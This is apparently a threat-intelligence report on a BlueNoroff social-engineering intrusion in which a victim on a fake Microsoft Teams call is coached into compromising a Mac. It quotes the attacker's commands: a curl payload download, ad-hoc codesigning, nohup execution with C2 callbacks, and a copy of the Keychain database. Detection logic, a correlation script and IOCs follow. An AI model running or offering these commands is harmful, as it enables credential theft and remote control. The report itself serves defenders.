BlueNoroff Weaponizes Microsoft Teams Calls to Steal macOS Credentials in Real-Time
Daylight Security has published findings from a real-world intrusion in which BlueNoroff — the financially motivated subgroup of North Korea's Lazarus Group — used live social engineering over Microsoft Teams to compromise a macOS endpoint, steal Keychain credentials, and stage data for exfiltration. The entire attack was operator-driven in real time, with no exploits or traditional malware delivery involved.
The activity aligns with the GhostCall campaign pattern previously attributed to BlueNoroff, in which victims are funneled from messaging platforms into meeting-based lures that enable live command execution and credential theft.
The Attack Chain
The intrusion began on Telegram. The attacker posed as a legitimate business prospect, built rapport, and escalated to a Microsoft Teams call using a lookalike domain — teams.microscall[.]com, registered January 15, 2026.
During the call, the attacker claimed to be experiencing audio issues and coached the victim into opening a terminal and running commands to "fix" the problem. Those commands were the attack.
Payload retrieval. The victim was instructed to download a binary via curl to a path designed to blend in with legitimate macOS system files:
curl -o /Library/Caches/com.apple.sys.receipt https://microsmeet[.]xyz/...
Defense evasion. The attacker walked the victim through making the file executable and ad-hoc signing it to reduce macOS execution friction:
chmod 777 /Library/Caches/com.apple.sys.receipt
codesign --force --deep --sign - /Library/Caches/com.apple.sys.receipt
Persistent execution. The binary was launched detached via nohup, with output suppressed:
nohup /Library/Caches/com.apple.sys.receipt http://bluyy[.]com/<id> >/dev/null 2>&1 &
Secondary components. A second payload masqueraded as an iCloud sync process, and a hidden file was unpacked from a zip archive in /tmp and executed with a C2 callback:
/private/tmp/com.apple.icloud.sync.app/Contents/MacOS/com.apple.icloud.sync 1 1 audio
/private/tmp/.aLTJwk supportzm[.]com:443
Credential theft. The attacker copied the victim's Keychain database directly:
cp -rf .../login.keychain-db /tmp/<staging_dir>
Data staging. AppleScript (osascript) sequences created directories and bundled stolen files for exfiltration to attacker-controlled infrastructure.
Why This Matters
Every tool used in this intrusion is native to macOS — curl, chmod, codesign, nohup, cp, osascript. There is no malware dropper, no exploit, no phishing link. The human is the delivery mechanism. Each individual action looks benign in isolation. It's the cluster that reveals the compromise.
This is the second distinct Lazarus social engineering campaign targeting developers disclosed today. Red Asgard's Contagious Interview investigation documented industrial-scale credential theft through fake coding interviews, affecting 857 developers across 90 countries. BlueNoroff's GhostCall campaign uses a different vector — live video calls instead of repository-based attacks — but the objective is identical: credentials, wallets, and persistent access.
Detection Guidance
The behavioral chain to alert on is curl writing to system-like cache paths, followed by chmod and ad-hoc codesign on the same file, followed by nohup execution from cache or tmp directories, followed by Keychain database access, followed by osascript-based file staging. Individually these are noise. Together they are compromise.
SOC teams should also monitor for Microsoft Teams connections to domains that are not teams.microsoft.com — particularly recently registered lookalike domains.
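As an added illustration of the correlation logic described above (this is not code from Daylight Security's report), the following Python sketch classifies process command lines into the chain stages named in this write-up and alerts on a host only when several distinct stages occur within one time window, which is what separates the benign noise of any single command from the compromise pattern. The sample telemetry is constructed, and the stage patterns, window and threshold are assumptions to tune against real EDR data:

```python
import re
from collections import defaultdict

# Constructed sample process-execution telemetry (not from the report);
# host mac-01 mirrors the chain described above, mac-02 is benign noise.
SAMPLE_EVENTS = [
    {"host": "mac-01", "ts": 100, "cmd": "curl -o /Library/Caches/com.apple.sys.receipt https://example.invalid/p"},
    {"host": "mac-01", "ts": 105, "cmd": "chmod 777 /Library/Caches/com.apple.sys.receipt"},
    {"host": "mac-01", "ts": 110, "cmd": "codesign --force --deep --sign - /Library/Caches/com.apple.sys.receipt"},
    {"host": "mac-01", "ts": 120, "cmd": "nohup /Library/Caches/com.apple.sys.receipt http://example.invalid/id >/dev/null 2>&1 &"},
    {"host": "mac-01", "ts": 300, "cmd": "cp -rf /Users/dev/Library/Keychains/login.keychain-db /tmp/stage"},
    {"host": "mac-01", "ts": 310, "cmd": "osascript -e 'do shell script \"mkdir -p /tmp/stage/out\"'"},
    {"host": "mac-02", "ts": 100, "cmd": "curl -o /tmp/release.tgz https://example.invalid/release.tgz"},
    {"host": "mac-02", "ts": 200, "cmd": "chmod 755 /tmp/build.sh"},
]

# Each stage of the chain as a command-line pattern (assumed; tune to your telemetry).
CACHE_OR_TMP = r"(/Library/Caches/|/private/tmp/|/tmp/)\S+"
STAGE_PATTERNS = [
    ("curl_cache_write", re.compile(r"^curl\b.*\s-o\s+" + CACHE_OR_TMP)),
    ("chmod_exec", re.compile(r"^chmod\b.*\s" + CACHE_OR_TMP)),
    ("adhoc_codesign", re.compile(r"^codesign\b.*--sign\s+-\s")),
    ("nohup_from_cache_or_tmp", re.compile(r"^nohup\s+" + CACHE_OR_TMP)),
    ("keychain_copy", re.compile(r"^cp\b.*login\.keychain-db")),
    ("osascript_staging", re.compile(r"^osascript\b")),
]

def classify(cmd):
    """Return the chain stage names a single command line matches (usually zero or one)."""
    return [name for name, pat in STAGE_PATTERNS if pat.search(cmd)]

def score_hosts(events, window=3600, min_stages=3):
    """Per host, slide over stage hits in time order and alert when at least min_stages
    distinct stages fall within `window` seconds; returns {host: sorted stages seen}."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: (e["host"], e["ts"])):
        for stage in classify(ev["cmd"]):
            hits[ev["host"]].append((ev["ts"], stage))
    alerts = {}
    for host, seq in hits.items():
        for i, (t0, _) in enumerate(seq):
            stages = {s for t, s in seq[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts

if __name__ == "__main__":
    for host, stages in score_hosts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

Only mac-01 trips the threshold; mac-02's lone curl-plus-chmod pair stays below it, which is the point of scoring the cluster rather than the individual command.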
Indicators of Compromise
Domains:
bluyy[.]com (Created 2026-01-20)
teams.microscall[.]com (Created 2026-01-15)
microsmeet[.]xyz (Created 2025-11-07)
supportzm[.]com (Created 2025-06-30)
IP Addresses:
23.254.130[.]131 (Hostwinds AS54290)
23.254.204[.]184 (Hostwinds AS54290)
File Paths:
/Library/Caches/com.apple.sys.receipt
/Library/Caches/com.apple.sys.receipt.cstemp
/private/tmp/.057B0D85-071D-4A43-B4FF-7281027B9B32.zip
/private/tmp/.7fTGPB
/private/tmp/.aLTJwk
/private/tmp/com.apple.icloud.sync.app/Contents/MacOS/com.apple.icloud.sync
SHA256 Hashes:
MITRE ATT&CK
T1566.003 — Phishing via Service: initial contact via Telegram, escalation to fake Teams call
T1204.002 — User Execution: Malicious File: victim coached into downloading and executing the binary
T1036.005 — Masquerading: Match Legitimate Name or Location: payload written to /Library/Caches/com.apple.sys.receipt, secondary component disguised as com.apple.icloud.sync
T1553.002 — Subvert Trust Controls: Code Signing: ad-hoc codesign applied to the malicious binary
T1555.001 — Credentials from Password Stores: Keychain: direct copy of login.keychain-db
T1059.002 — Command and Scripting Interpreter: AppleScript: osascript used for data staging
T1071.001 — Application Layer Protocol: Web Protocols: C2 communication over HTTP/HTTPS to attacker domains